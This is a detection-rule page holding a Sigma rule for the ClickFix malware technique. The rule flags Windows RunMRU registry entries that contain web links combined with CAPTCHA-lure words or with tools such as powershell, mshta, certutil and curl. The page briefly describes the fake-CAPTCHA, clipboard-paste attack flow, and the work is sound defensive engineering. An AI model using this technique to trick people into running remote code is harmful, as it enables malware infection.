Potential ClickFix Execution Pattern - Registry

calendar Sep 22, 2025 · attack.execution attack.t1204.001  ·
Share on: linkedin copy

Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, such as one-liners that execute remotely hosted malicious files or scripts.

Sigma rule (View on GitHub)

 1title: Potential ClickFix Execution Pattern - Registry
 2id: f5fe36cf-f1ec-4c23-903d-09a3110f6bbb
 3status: experimental
 4description: |
 5    Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links.
 6    ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages.
 7    Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content,
 8    such as one-liners that execute remotely hosted malicious files or scripts.    
 9references:
10    - https://github.com/JohnHammond/recaptcha-phish
11    - https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware
12    - https://www.threatdown.com/blog/clipboard-hijacker-tries-to-install-a-trojan/
13    - https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2
14    - https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution
15    - https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724
16    - https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
17    - https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493
18author: Swachchhanda Shrawan Poudel (Nextron Systems)
19date: 2025-03-25
20tags:
21    - attack.execution
22    - attack.t1204.001
23logsource:
24    category: registry_set
25    product: windows
26detection:
27    selection_registry:
28        TargetObject|contains: '\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\'
29    selection_details:
30        Details|contains:
31            - 'http://'
32            - 'https://'
33    selection_susp_pattern:
34        - Details|contains:
35              # Add more suspicious keywords
36              - 'account'
37              - 'anti-bot'
38              - 'botcheck'
39              - 'captcha'
40              - 'challenge'
41              - 'confirmation'
42              - 'fraud'
43              - 'human'
44              - 'identificator'
45              - 'identity'
46              - 'robot'
47              - 'validation'
48              - 'verification'
49              - 'verify'
50        - Details|contains:
51              - '%comspec%'
52              - 'bitsadmin'
53              - 'certutil'
54              - 'cmd'
55              - 'cscript'
56              - 'curl'
57              - 'mshta'
58              - 'powershell'
59              - 'pwsh'
60              - 'regsvr32'
61              - 'rundll32'
62              - 'schtasks'
63              - 'wget'
64              - 'wscript'
65    condition: all of selection_*
66falsepositives:
67    - Legitimate applications using RunMRU with HTTP links
68level: high

References

Related rules

to-top